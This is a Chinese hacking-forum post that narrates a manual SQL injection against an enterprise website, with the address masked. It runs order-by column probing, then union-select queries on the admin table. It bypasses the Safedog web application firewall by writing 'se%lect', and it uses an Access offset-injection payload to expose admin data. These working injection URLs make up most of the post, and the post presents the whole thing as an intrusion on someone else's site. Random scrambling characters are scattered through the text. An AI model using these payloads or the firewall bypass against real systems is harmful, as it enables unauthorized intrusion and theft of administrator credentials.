找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2060|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。' o2 D  X! K' ]$ f$ `
3 _: F0 B% m" `' c( S. u! e

% [! [" a' M" `9 h! Z顺手加个admin
9 r2 T% [  Q: ~# Q; j
$ X7 d/ A3 f! l& d- g
% M6 }" Y0 T8 g9 Y2 U1 a, E% r, S默认后台。, I. S# L6 ]; d) q  g4 g% t
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
* _' }' p2 ]9 D9 h5 e8 {% `4 v0 X0 o

2 I7 L5 P+ J+ M8 K
1 {+ z7 Y* \1 ^- s! z所以就不用御剑扫了,待会直接封IP。: o! {% H% _2 `8 i- R, p
& X" K6 z# K1 f+ ?0 l) w
用order by语句判断是否存在注入。4 h& N4 @$ `! j: C3 e" m
http://www.xxx.com /product_show.asp?id=997 order by 1
; Z8 ^- h+ e: M1 x" M+ l7 Bhttp://www.xxx.com /product_show.asp?id=997 order by 100# D& c& g( U- W, L* Q: U' F3 j) a$ B
现在存在注入,经测试后发现是9个字段。: m" r: D  o* A
) `* n+ a$ }  ^* T% X2 ~% Z
接下来进行联合查询,猜是否存在admin表。
) Q! L# d" J6 E( ohttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​- n3 h3 g  q4 v" `, F. k1 ~

' Q# F, ]# S4 f$ F6 F* v8 F. p* p4 F2 V; _6 r+ s8 T

) \8 i+ r; |# h在select中间加个%,se%lect绕过安全狗。0 s2 r$ ], J/ T) f, ^% ^
4 T! Q* ^: A5 \6 {* B5 I
5 W- ^4 j# |! q6 h6 _
发现存在admin表,然后开始手工猜常用的字段。% f9 y5 ~4 {, u2 m0 O( Y* e6 K
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。9 M6 }# y& I5 k

; p+ P  z6 o# L& B8 P. ], P$ u突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
% Q, @* Q8 \. `# f: K& X
7 E% P& F" d8 T% ?" b科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。  O; I. W- n0 ^& H' u& I
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin; R' D' S8 k: E
好了,敏感内容出显了。​4 A  I4 X# Q( e

3 ^9 j1 P8 J5 d8 j
* {, T9 j; r$ \& j8 B, ^4 n; `  l, m$ W) f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表